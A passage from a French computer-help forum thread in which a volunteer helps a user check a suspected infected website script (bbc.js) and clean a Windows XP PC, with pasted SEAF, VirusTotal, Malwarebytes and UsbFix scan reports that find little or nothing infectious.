      IL sera enregistré ici : C:\SEAFlog.txt
      0
  10. GWEN
     
    Bonjour Jacques, voici le rapport:

    1. ========================= SEAF 1.0.0.7 - C_XX
    2.
    3. Commencé à: 14:42:31 le 15/09/2010
    4.
    5. Valeur(s) recherchée(s):
    6.
    7. bbc.js
    8.
    9. (!) --- Recherche registre
    10.
    11. ====== Fichier(s) (TC: Date de création, TM: Date de modification, DA, Dernier accès) ======
    12.
    13. "c:\Program Files\EasyPHP1-8\www\gites\sp\bbc.js" [ ----A---- | 15340 ]
    14. TC: 06/09/2010,22:23:22 | TM: 06/09/2010,22:23:23 | DA: 14/09/2010,21:19:39
    15.
    16. =========================
    17.
    18. "c:\Program Files\EasyPHP1-8\www\gites\nl\bbc.js" [ ----A---- | 15340 ]
    19. TC: 06/09/2010,22:20:11 | TM: 06/09/2010,22:20:12 | DA: 14/09/2010,21:19:56
    20.
    21. =========================
    22.
    23. "c:\Program Files\EasyPHP1-8\www\gites\it\bbc.js" [ ----A---- | 15340 ]
    24. TC: 06/09/2010,22:16:39 | TM: 06/09/2010,22:16:39 | DA: 14/09/2010,21:20:16
    25.
    26. =========================
    27.
    28. "c:\Program Files\EasyPHP1-8\www\gites\fr\bbc.js" [ ----A---- | 15340 ]
    29. TC: 06/09/2010,22:12:27 | TM: 06/09/2010,22:12:28 | DA: 14/09/2010,21:20:42
    30.
    31. =========================
    32.
    33. "c:\Program Files\EasyPHP1-8\www\gites\en\bbc.js" [ ----A---- | 15340 ]
    34. TC: 06/09/2010,22:08:59 | TM: 06/09/2010,22:08:59 | DA: 14/09/2010,21:21:01
    35.
    36. =========================
    37.
    38. "c:\Program Files\EasyPHP1-8\www\gites\de\bbc.js" [ ----A---- | 15340 ]
    39. TC: 06/09/2010,22:26:48 | TM: 06/09/2010,22:26:48 | DA: 14/09/2010,21:21:19
    40.
    41. =========================
    42.
    43. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\gites\sp\bbc.js" [ ----A---- | 15340 ]
    44. TC: 14/09/2010,17:28:32 | TM: 06/09/2010,22:23:23 | DA: 14/09/2010,17:29:49
    45.
    46. =========================
    47.
    48. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\gites\nl\bbc.js" [ ----A---- | 15340 ]
    49. TC: 14/09/2010,17:28:55 | TM: 06/09/2010,22:20:12 | DA: 14/09/2010,17:29:58
    50.
    51. =========================
    52.
    53. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\gites\it\bbc.js" [ ----A---- | 15340 ]
    54. TC: 14/09/2010,17:30:21 | TM: 06/09/2010,22:16:39 | DA: 14/09/2010,17:30:21
    55.
    56. =========================
    57.
    58. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU.02.2010\gites\sp\bbc.js" [ ----A---- | 15340 ]
    59. TC: 02/02/2010,00:25:29 | TM: 02/02/2010,00:25:29 | DA: 12/09/2010,23:41:05
    60.
    61. =========================
    62.
    63. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU.02.2010\gites\nl\bbc.js" [ ----A---- | 15340 ]
    64. TC: 02/02/2010,00:21:17 | TM: 02/02/2010,00:21:17 | DA: 12/09/2010,23:41:00
    65.
    66. =========================
    67.
    68. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU.02.2010\gites\it\bbc.js" [ ----A---- | 15340 ]
    69. TC: 02/02/2010,00:17:31 | TM: 02/02/2010,00:17:32 | DA: 12/09/2010,23:40:56
    70.
    71. =========================
    72.
    73. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU.02.2010\gites\fr\bbc.js" [ ----A---- | 15340 ]
    74. TC: 02/02/2010,00:29:07 | TM: 02/02/2010,00:29:08 | DA: 12/09/2010,23:40:52
    75.
    76. =========================
    77.
    78. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU.02.2010\gites\en\bbc.js" [ ----A---- | 15340 ]
    79. TC: 02/02/2010,00:13:24 | TM: 02/02/2010,00:13:25 | DA: 12/09/2010,23:40:48
    80.
    81. =========================
    82.
    83. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU.02.2010\gites\de\bbc.js" [ ----A---- | 15340 ]
    84. TC: 02/02/2010,00:09:32 | TM: 02/02/2010,00:09:33 | DA: 12/09/2010,23:40:41
    85.
    86. =========================
    87.
    88. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU GOOD 09.2010\gites\sp\bbc.js" [ ----A---- | 15340 ]
    89. TC: 07/09/2010,08:18:25 | TM: 06/09/2010,22:23:23 | DA: 12/09/2010,23:40:29
    90.
    91. =========================
    92.
    93. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU GOOD 09.2010\gites\nl\bbc.js" [ ----A---- | 15340 ]
    94. TC: 07/09/2010,08:18:51 | TM: 06/09/2010,22:20:12 | DA: 12/09/2010,23:40:20
    95.
    96. =========================
    97.
    98. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU GOOD 09.2010\gites\it\bbc.js" [ ----A---- | 15340 ]
    99. TC: 07/09/2010,08:19:14 | TM: 06/09/2010,22:16:39 | DA: 12/09/2010,23:40:14
    100.
    101. =========================
    102.
    103. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU GOOD 09.2010\gites\fr\bbc.js" [ ----A---- | 15340 ]
    104. TC: 07/09/2010,08:19:44 | TM: 06/09/2010,22:12:28 | DA: 14/09/2010,17:36:00
    105.
    106. =========================
    107.
    108. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU GOOD 09.2010\gites\en\bbc.js" [ ----A---- | 15340 ]
    109. TC: 07/09/2010,08:20:05 | TM: 06/09/2010,22:08:59 | DA: 12/09/2010,23:40:01
    110.
    111. =========================
    112.
    113. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU GOOD 09.2010\gites\de\bbc.js" [ ----A---- | 15340 ]
    114. TC: 07/09/2010,08:20:26 | TM: 06/09/2010,22:26:48 | DA: 12/09/2010,23:39:58
    115.
    116. =========================
    117.
    118. "z:\MAHON\gite\bbc.js" [ ----A---- | 15340 ]
    119. TC: 15/09/2010,12:54:55 | TM: 15/09/2010,12:54:56 | DA: 15/09/2010,12:54:56
    120.
    121. =========================
    122.
    123. "z:\MAHON\gite\fr\bbc.js" [ ----A---- | 15340 ]
    124. TC: 15/09/2010,12:55:36 | TM: 15/09/2010,12:55:37 | DA: 15/09/2010,12:55:37
    125.
    126. =========================
    127.
    128. ====== Dossier(s) (TC: Date de création, TM: Date de modification, DA, Dernier accès) ======
    129.
    130. Aucun dossier trouvé
    131.
    132.
    133. ====== Entrée(s) du registre ======
    134.
    135. Aucune entrée du registre trouvée
    136.
    137. =========================
    138.
    139. Fin à: 14:43:24 le 15/09/2010 ( E.O.F )
    1
    1. GWEN
       
      Bon..... j'ai rapatrié le site ami "GITE" sur Z: GOOGle dit ceci à propos de lui:

      "Sur les 3 pages testées sur ce site au cours des 90 derniers jours, 3 page(s) a (ont) généré le téléchargement et l'installation de programmes malveillants sans l'autorisation de l'internaute. Google a visité ce site pour la dernière fois le 2010-08-25 et un contenu suspect a été détecté sur ce site pour la dernière fois le 2010-08-25.

      Le programme malveillant est hébergé sur 1 domaine(s), dont nuttypiano.com/.

      This site was hosted on 1 network(s) including AS8560 (SCHLUND)."

      Je m'appercois que mon site :"GITES" a des trucs (ligne 93). Je ne sais plus si c'est un BU de mon site GITES en ligne. Aussi vais-je rapatrier mon site en ligne , faire la même analyse et le poster ici. Est-ce OK avec toi?
      0
    2. GWEN
       
      Voici le rapport de SEAFlog no2 (avec le site "GITE" [ami]et le site "GITES" [le mien] rapatrié sur C:\et Z:\

      http://www.cijoint.fr/cjlink.php?file=cj201009/cijJnPSthK.txt

      J'espère ne pas être ennuyeux!

      Avec reconnaissance :-)
      0
    3. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
       
      bonjour , peux tu faire analyser sur virus total !!

      Rends toi sur ce site :

      https://www.virustotal.com/gui/

      Clique sur parcourir et cherche ce fichier : bbc.js

      tu suis le chemin : c:\Program Files\EasyPHP1-8\www\gites\sp\bbc.js

      Clique sur envoyer le lien.

      Un rapport va s'élaborer ligne à ligne.

      Attends la fin. Il doit comprendre la taille du fichier envoyé.

      Sauvegarde le rapport avec le bloc-note.

      Copie le dans ta réponse.

      Si VirusTotal indique que le fichier a déjà été analysé, clique sur le bouton Ré-analyse le fichier maintenant.
      0
  11. Gwen
     
    Bonjour Jacques, voici le rapport

    File name:
    bbc.js
    Submission date:
    2010-09-19 09:01:45 (UTC)
    Current status:
    queued (#12) queued analysing finished
    Result:
    0/ 43 (0.0%)

    Additional information
    Show all
    MD5 : 080104d8cfe13c26112aaed57842a76f
    SHA1 : cedf6c30c6e312ce59fa5dc4c10357865f06e9de
    SHA256: 032a0bf006addf4bad14c7b89492999d8abbfd4970b82d9eeec0d9d082253508
    1
    1. Gwen
       
      Même résultats pour les autres langues: fr, de, en, it........
      0
    2. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
       
      ok donc pas infectieux !! je ne vois pas , essais de voir pour repasser malwarebytes avec la clé de ton site connecté tu lui fais faire la mise à jour avant de lancer l'examen complet, mais avant tu purge la restauration système comme cela tu auras un point tout neuf si tu perdais la connection et sans infection dedans

      Après une désinfection il est utile de supprimer tous les points de restauration système de façon à ne pas remonter, par mégarde, un point de restauration infecté.

      Pour cela, il faut désactiver la restauration système (ce qui aura pour conséquence de supprimer tous les points de restauration existants) puis la réactiver juste après pour que Windows continue à faire des points de sauvegarde réguliers.


      Supprimer les anciens points de restauration : System Volume Information\_restore

      (1) Désactiver la Restauration du système

      cliques sur Démarrer
      Cliques droit sur Poste de travail
      cliques sur Propriétés
      Cliques sur l'onglet Restauration du système
      Coches Désactiver la Restauration du système sur tous les lecteurs
      Cliques sur Appliquer, Lorsque le message de confirmation apparaît,
      cliques sur Oui.
      Cliques sur OK.


      (2) Activer la Restauration du système


      cliques sur Démarrer
      Cliques droit sur Poste de travail
      cliques sur Propriétés
      Cliques sur l'onglet Restauration du système
      Décoches Désactiver la Restauration du système sur tous les lecteurs
      Cliques sur Appliquer, Lorsque le message de confirmation apparaît,
      cliques sur Oui.
      Cliques sur OK.





      (3) Créer un point de restauration


      .cliquer sur démarrer
      .cliquer sur tous les programmes
      .cliquer sur accessoires
      .cliquer sur outils système
      .cliquer sur restauration du système
      .sur la fenêtre qui s'ouvre cocher créer un point de restauration
      .cliquer sur suivant
      .dans la fenêtre description du point de restauration lui donner un nom explisitede façon à savoir à quoi il correspond
      .cliquer sur céer
      .une fois que la page s'affiche avec en haut sur gauche le nom et l'heure de ton point de restauration fermes la fenêtre
      0
  12. Gwen
     
    Bonjour Jacques, voici le rapport:

    Malwarebytes' Anti-Malware 1.46
    www.malwarebytes.org

    Version de la base de données: 4651

    Windows 5.1.2600 Service Pack 3
    Internet Explorer 8.0.6001.18702

    19/09/2010 17:28:57
    mbam-log-2010-09-19 (17-28-57).txt

    Type d'examen: Examen complet (C:\|E:\|Z:\|)
    Elément(s) analysé(s): 281391
    Temps écoulé: 1 heure(s), 30 minute(s), 37 seconde(s)

    Processus mémoire infecté(s): 0
    Module(s) mémoire infecté(s): 0
    Clé(s) du Registre infectée(s): 0
    Valeur(s) du Registre infectée(s): 0
    Elément(s) de données du Registre infecté(s): 0
    Dossier(s) infecté(s): 0
    Fichier(s) infecté(s): 0

    Processus mémoire infecté(s):
    (Aucun élément nuisible détecté)

    Module(s) mémoire infecté(s):
    (Aucun élément nuisible détecté)

    Clé(s) du Registre infectée(s):
    (Aucun élément nuisible détecté)

    Valeur(s) du Registre infectée(s):
    (Aucun élément nuisible détecté)

    Elément(s) de données du Registre infecté(s):
    (Aucun élément nuisible détecté)

    Dossier(s) infecté(s):
    (Aucun élément nuisible détecté)

    Fichier(s) infecté(s):
    (Aucun élément nuisible détecté)

    APPAREMMENT? RIEN N4EST INFECTE§
    1
    1. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
       
      effectivement rien trouvé !!
      0
    2. Gwen
       
      Bonjour Jacques.

      Dois-je comprendre que c'est terminé? As-tu des conseils pour optimiser la protection du Pc?

      Merci.

      Gwen
      0
    3. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
       
      bonjour, pour moi oui je ne vois plus d'infections !!

      pour sécuriser ton pc tu as ton anti-virus bitdéfender est ce un total sécurité , avec pare-feu ?? sinon il faudrait que tu en mettre un plus puissant que celui de windows !! il y en a en gratuit !! sinon en complement de bitdéfender tu conserves malwarebytes tu lui fais faire un examen rapide régulièrement 1 fois semaine , mais toujours après avoir fait faire la mise à jour avant , et puis utilises ccleaner en mode nettoyage le plus souvant possible le mieux serait de le faire à chaque arrêt du pc !! et puis passes le sur le registre après chaque désinstallation de programmes , faire attention au site que tu fréquentes , et les téléchargements !! et aps cliquer sur tous et n'importe quoi !! mais je pense que tu sais déjà cela !!
      0
  13. gwen
     
    UsbFix rapport:

    ############################## | UsbFix 7.024 | [Suppression]

    Utilisateur: Gwen (Administrateur) # GWEN2 [ ]
    Mis à jour le 09/09/10 par El Desaparecido / C_XX
    Lancé à 10:31:27 | 13/09/2010
    Site Web: http://www.teamxscript.org
    Contact: FindyKill.Contact@gmail.com

    CPU: Intel(R) Core(TM)2 Duo CPU T5470 @ 1.60GHz
    CPU 2: Intel(R) Core(TM)2 Duo CPU T5470 @ 1.60GHz
    Microsoft Windows XP Édition familiale (5.1.2600 32-Bit) # Service Pack 3
    Internet Explorer 8.0.6001.18702

    Pare-feu Windows: Désactivé /!\
    Antivirus: BitDefender Antivirus 13.0.21 [Enabled | Updated]
    Firewall: BitDefender Pare-feu 13.0.21 [Enabled]
    RAM -> 2046 Mo
    C:\ (%systemdrive%) -> Disque fixe # 39 Go (17 Go libre(s) - 43%) [] # NTFS
    D:\ -> CD-ROM
    E:\ -> Disque amovible # 8 Go (7 Go libre(s) - 92%) [CORSAIR] # FAT32
    Z:\ -> Disque fixe # 67 Go (29 Go libre(s) - 44%) [Données] # NTFS

    ################## | Éléments infectieux |

    ################## | Registre |

    ################## | Mountpoints2 |

    Supprimé! HKCU\.\.\.\.\Explorer\MountPoints2\{c5c1f6e0-74e9-11de-b42e-001d09a440fe}

    ################## | Listing |

    [12/09/2010 - 22:32:10 | SHD ] C:\$RECYCLE.BIN
    [21/11/2009 - 22:31:08 | RHD ] C:\AHCache
    [12/09/2010 - 10:55:53 | A | 4] C:\AUTOEXEC.BAT
    [10/09/2010 - 21:00:14 | A | 107434] C:\bdlog.txt
    [27/12/2009 - 11:12:14 | A | 15078524] C:\BdUninstallTool2009.12.27-10.04.39.log
    [27/12/2009 - 11:12:14 | A | 287901] C:\BdUninstallTool2009.12.27-10.04.39.reg
    [27/08/2010 - 09:47:51 | RASH | 217] C:\boot.ini
    [05/08/2004 - 14:00:00 | RASH | 4952] C:\Bootfont.bin
    [09/09/2010 - 20:14:10 | D ] C:\Config.Msi
    [20/08/2004 - 12:37:16 | A | 0] C:\CONFIG.SYS
    [30/01/2008 - 21:00:34 | D ] C:\dell
    [26/01/2008 - 04:40:26 | RAH | 7022] C:\dell.sdr
    [07/09/2010 - 14:42:40 | D ] C:\Documents and Settings
    [08/05/2007 - 23:49:02 | D ] C:\drivers
    [12/09/2010 - 21:50:39 | ASH | 2145579008] C:\hiberfil.sys
    [17/10/2009 - 11:50:55 | D ] C:\i386
    [24/11/2008 - 14:37:23 | A | 486] C:\IIIIIIIIIIIIIIIIIII MES PHOTOS (2).lnk
    [10/07/2010 - 22:24:09 | A | 48224] C:\image1000.jpg
    [30/01/2008 - 10:54:52 | A | 4128] C:\INFCACHE.1
    [20/08/2004 - 12:37:16 | AH | 0] C:\IO.SYS
    [12/09/2010 - 10:25:27 | D ] C:\Kill'em
    [12/09/2010 - 09:58:08 | A | 40447] C:\List'em.txt
    [20/08/2004 - 12:37:16 | AH | 0] C:\MSDOS.SYS
    [05/08/2004 - 14:00:00 | RASH | 47564] C:\NTDETECT.COM
    [31/05/2008 - 12:05:18 | RASH | 252240] C:\ntldr
    [12/09/2010 - 21:50:33 | ASH | 2145386496] C:\pagefile.sys
    [12/09/2010 - 18:19:55 | RD ] C:\Program Files
    [13/09/2010 - 10:34:18 | SHD ] C:\RECYCLER
    [10/01/2010 - 13:27:59 | D ] C:\SCRIPT COBIAN
    [22/07/2010 - 00:48:15 | SHD ] C:\System Volume Information
    [07/09/2010 - 14:57:23 | D ] C:\Top-Position
    [13/09/2010 - 10:34:21 | D ] C:\UsbFix
    [13/09/2010 - 10:34:21 | A | 2805] C:\UsbFix.txt
    [29/05/2008 - 14:06:01 | D ] C:\USB_V92
    [12/09/2010 - 22:08:58 | D ] C:\WINDOWS
    [09/09/2010 - 20:15:10 | A | 190] C:\ZHPExportRegistry-09-09-2010-20-15-10.txt
    [11/09/2010 - 22:59:24 | D ] E:\BU GITE
    [12/09/2010 - 22:32:12 | SHD ] Z:\$RECYCLE.BIN
    [21/07/2010 - 09:46:39 | RD ] Z:\A SHOPPING, infos divers et guides d'achats
    [26/08/2010 - 17:20:12 | RD ] Z:\A Tarif POSTE
    [01/09/2010 - 21:35:34 | RD ] Z:\aa ALL GESTION
    [12/09/2010 - 08:35:15 | RD ] Z:\Anniversaire
    [09/09/2010 - 21:41:00 | RD ] Z:\B.U BU BU BU BU BU BU
    [06/09/2010 - 19:57:22 | D ] Z:\BANQUE et infos
    [11/05/2010 - 20:05:44 | RD ] Z:\CANON
    [26/08/2010 - 17:36:13 | RD ] Z:\CHRISTINE
    [21/07/2010 - 10:26:38 | D ] Z:\COLUCHE
    [11/05/2010 - 12:26:27 | D ] Z:\COMMUNICATION ET WEB
    [11/05/2010 - 12:26:28 | D ] Z:\f5e68a0ee944f89528dad021dda0
    [20/07/2010 - 21:21:29 | RD ] Z:\from Dell
    [12/09/2010 - 22:27:21 | RD ] Z:\FROM WEB
    [23/01/2008 - 18:45:08 | A | 29963] Z:\image1000.jpg
    [11/05/2010 - 12:29:09 | D ] Z:\LeConjugueur
    [09/09/2010 - 21:41:44 | RD ] Z:\LES PASS
    [01/07/2010 - 21:04:31 | RD ] Z:\LYCEE AGRICOLE
    [13/09/2010 - 10:28:19 | D ] Z:\MES DOCUMENTS SUR Z
    [07/02/2008 - 14:47:53 | RHD ] Z:\MSOCache
    [11/05/2010 - 13:04:53 | RD ] Z:\MULTIMEDIA MULTIMEDIA MULTIMEDIA
    [28/06/2010 - 15:08:45 | D ] Z:\PAROLES CHANSONS
    [12/09/2010 - 21:23:07 | RD ] Z:\PC PC PC PC PC OUTILS
    [21/07/2010 - 10:34:54 | D ] Z:\PECHE
    [11/05/2010 - 13:16:34 | RD ] Z:\Porte-documents D
    [13/09/2010 - 10:34:18 | SHD ] Z:\RECYCLER
    [07/08/2010 - 19:05:44 | D ] Z:\RELEVES DE COMPTE
    [18/01/2009 - 12:56:38 | A | 14747] Z:\Samouraï du Houx.pdf
    [22/07/2010 - 10:35:43 | D ] Z:\Stockage outlook
    [21/07/2010 - 10:21:48 | D ] Z:\SUCCESSION
    [22/07/2010 - 00:48:15 | SHD ] Z:\System Volume Information
    [11/05/2010 - 13:16:34 | RD ] Z:\Ttes les dates
    [11/05/2010 - 13:16:37 | RD ] Z:\VIDEO

    ################## | Vaccin |

    C:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
    E:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
    Z:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)

    ################## | E.O.F |
    0
    1. gwen
       
      J'avais oublié de brancher le disk externe, j'ai donc refait tourner UsbFix sur "suppression" et voici le rapport:

      ############################## | UsbFix 7.024 | [Suppression]

      Utilisateur: Gwen (Administrateur) # GWEN2 [ ]
      Mis à jour le 09/09/10 par El Desaparecido / C_XX
      Lancé à 11:01:36 | 13/09/2010
      Site Web: http://www.teamxscript.org
      Contact: FindyKill.Contact@gmail.com

      CPU: Intel(R) Core(TM)2 Duo CPU T5470 @ 1.60GHz
      CPU 2: Intel(R) Core(TM)2 Duo CPU T5470 @ 1.60GHz
      Microsoft Windows XP Édition familiale (5.1.2600 32-Bit) # Service Pack 3
      Internet Explorer 8.0.6001.18702

      Pare-feu Windows: Désactivé /!\
      Antivirus: BitDefender Antivirus 13.0.21 [Enabled | Updated]
      Firewall: BitDefender Pare-feu 13.0.21 [Enabled]
      RAM -> 2046 Mo
      C:\ (%systemdrive%) -> Disque fixe # 39 Go (17 Go libre(s) - 43%) [] # NTFS
      D:\ -> CD-ROM
      E:\ -> Disque amovible # 8 Go (7 Go libre(s) - 92%) [CORSAIR] # FAT32
      F:\ -> Disque fixe # 466 Go (304 Go libre(s) - 65%) [My Book] # FAT32
      Z:\ -> Disque fixe # 67 Go (29 Go libre(s) - 44%) [Données] # NTFS

      ################## | Éléments infectieux |

      Supprimé! F:\Autorun.inf
      Supprimé! F:\regedit.exe

      ################## | Registre |


      ################## | Mountpoints2 |


      ################## | Listing |

      [12/09/2010 - 22:32:10 | SHD ] C:\$RECYCLE.BIN
      [21/11/2009 - 22:31:08 | RHD ] C:\AHCache
      [12/09/2010 - 10:55:53 | A | 4] C:\AUTOEXEC.BAT
      [13/09/2010 - 10:34:28 | RASHD ] C:\Autorun.inf
      [27/12/2009 - 11:12:14 | A | 15078524] C:\BdUninstallTool2009.12.27-10.04.39.log
      [27/12/2009 - 11:12:14 | A | 287901] C:\BdUninstallTool2009.12.27-10.04.39.reg
      [27/08/2010 - 09:47:51 | RASH | 217] C:\boot.ini
      [05/08/2004 - 14:00:00 | RASH | 4952] C:\Bootfont.bin
      [09/09/2010 - 20:14:10 | D ] C:\Config.Msi
      [20/08/2004 - 12:37:16 | A | 0] C:\CONFIG.SYS
      [30/01/2008 - 21:00:34 | D ] C:\dell
      [26/01/2008 - 04:40:26 | RAH | 7022] C:\dell.sdr
      [07/09/2010 - 14:42:40 | D ] C:\Documents and Settings
      [08/05/2007 - 23:49:02 | D ] C:\drivers
      [12/09/2010 - 21:50:39 | ASH | 2145579008] C:\hiberfil.sys
      [17/10/2009 - 11:50:55 | D ] C:\i386
      [10/07/2010 - 22:24:09 | A | 48224] C:\image1000.jpg
      [30/01/2008 - 10:54:52 | A | 4128] C:\INFCACHE.1
      [20/08/2004 - 12:37:16 | AH | 0] C:\IO.SYS
      [12/09/2010 - 10:25:27 | D ] C:\Kill'em
      [20/08/2004 - 12:37:16 | AH | 0] C:\MSDOS.SYS
      [05/08/2004 - 14:00:00 | RASH | 47564] C:\NTDETECT.COM
      [31/05/2008 - 12:05:18 | RASH | 252240] C:\ntldr
      [12/09/2010 - 21:50:33 | ASH | 2145386496] C:\pagefile.sys
      [12/09/2010 - 18:19:55 | RD ] C:\Program Files
      [13/09/2010 - 11:06:01 | SHD ] C:\RECYCLER
      [10/01/2010 - 13:27:59 | D ] C:\SCRIPT COBIAN
      [22/07/2010 - 00:48:15 | SHD ] C:\System Volume Information
      [07/09/2010 - 14:57:23 | D ] C:\Top-Position
      [13/09/2010 - 11:06:01 | D ] C:\UsbFix
      [13/09/2010 - 11:06:02 | A | 2710] C:\UsbFix.txt
      [29/05/2008 - 14:06:01 | D ] C:\USB_V92
      [12/09/2010 - 22:08:58 | D ] C:\WINDOWS
      [11/09/2010 - 22:59:24 | D ] E:\BU GITE
      [13/09/2010 - 10:34:54 | RASHD ] E:\Autorun.inf
      [21/07/2010 - 02:59:48 | D ] F:\B.U Différenciel
      [26/09/2007 - 15:51:18 | D ] F:\autorun
      [21/07/2010 - 10:45:24 | D ] F:\Prefetch
      [21/07/2010 - 12:39:28 | D ] F:\B.U incrementiel
      [10/09/2010 - 14:18:00 | SHD ] F:\FOUND.000
      [09/02/2008 - 16:54:22 | SHD ] F:\System Volume Information
      [01/01/2010 - 09:34:50 | RD ] F:\TS LES BACK-UP
      [09/02/2008 - 18:35:14 | SHD ] F:\Recycled
      [27/12/2009 - 11:03:46 | A | 1048576512] F:\COFFREFORT BITDEFENDEUR.bvd
      [12/09/2010 - 22:32:12 | SHD ] Z:\$RECYCLE.BIN
      [21/07/2010 - 09:46:39 | RD ] Z:\A SHOPPING, infos divers et guides d'achats
      [26/08/2010 - 17:20:12 | RD ] Z:\A Tarif POSTE
      [01/09/2010 - 21:35:34 | RD ] Z:\aa ALL GESTION
      [12/09/2010 - 08:35:15 | RD ] Z:\Anniversaire
      [13/09/2010 - 10:34:52 | RASHD ] Z:\Autorun.inf
      [09/09/2010 - 21:41:00 | RD ] Z:\B.U BU BU BU BU BU BU
      [06/09/2010 - 19:57:22 | D ] Z:\BANQUE et infos
      [11/05/2010 - 20:05:44 | RD ] Z:\CANON
      [26/08/2010 - 17:36:13 | RD ] Z:\CHRISTINE
      [21/07/2010 - 10:26:38 | D ] Z:\COLUCHE
      [11/05/2010 - 12:26:27 | D ] Z:\COMMUNICATION ET WEB
      [11/05/2010 - 12:26:28 | D ] Z:\f5e68a0ee944f89528dad021dda0
      [20/07/2010 - 21:21:29 | RD ] Z:\from Dell
      [12/09/2010 - 22:27:21 | RD ] Z:\FROM WEB
      [23/01/2008 - 18:45:08 | A | 29963] Z:\image1000.jpg
      [11/05/2010 - 12:29:09 | D ] Z:\LeConjugueur
      [09/09/2010 - 21:41:44 | RD ] Z:\LES PASS
      [01/07/2010 - 21:04:31 | RD ] Z:\LYCEE AGRICOLE
      [13/09/2010 - 10:28:19 | D ] Z:\MES DOCUMENTS SUR Z
      [07/02/2008 - 14:47:53 | RHD ] Z:\MSOCache
      [11/05/2010 - 13:04:53 | RD ] Z:\MULTIMEDIA MULTIMEDIA MULTIMEDIA
      [28/06/2010 - 15:08:45 | D ] Z:\PAROLES CHANSONS
      [13/09/2010 - 11:00:02 | RD ] Z:\PC PC PC PC PC OUTILS
      [21/07/2010 - 10:34:54 | D ] Z:\PECHE
      [11/05/2010 - 13:16:34 | RD ] Z:\Porte-documents D
      [13/09/2010 - 11:06:01 | SHD ] Z:\RECYCLER
      [07/08/2010 - 19:05:44 | D ] Z:\RELEVES DE COMPTE
      [18/01/2009 - 12:56:38 | A | 14747] Z:\Samouraï du Houx.pdf
      [22/07/2010 - 10:35:43 | D ] Z:\Stockage outlook
      [21/07/2010 - 10:21:48 | D ] Z:\SUCCESSION
      [22/07/2010 - 00:48:15 | SHD ] Z:\System Volume Information
      [11/05/2010 - 13:16:34 | RD ] Z:\Ttes les dates
      [11/05/2010 - 13:16:37 | RD ] Z:\VIDEO

      ################## | Vaccin |

      C:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
      E:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
      F:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
      Z:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)

      ################## | Upload |

      Veuillez envoyer le fichier: C:\UsbFix_Upload_Me_GWEN2.zip
      https://www.ionos.fr/?affiliate_id=77097
      Merci de votre contribution.

      ################## | E.O.F |

      Merci!
      0
  14. gwen
     
    Je voudrais dire un grand merci à Jacques qui a été compétant, disponible et serviable... répondant à mes multiples questions..... pour preuve, la longueur de cette page!!!!

    Merci encore Jacques pour ton aide si précieuses et tes conseils pour garder le Pc "safe". J'espère que d'autres en profiteront!

    En guise de remerciement, nous avons un gîte près du Mt St Michel. Tu seras le bienvenu une semaine pourvu que le gite soit dispo, si possible hors vacances scolaire!

    Bien à toi
    0
    1. jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 645
       
      bonjour, merci pour la proposition @+
      0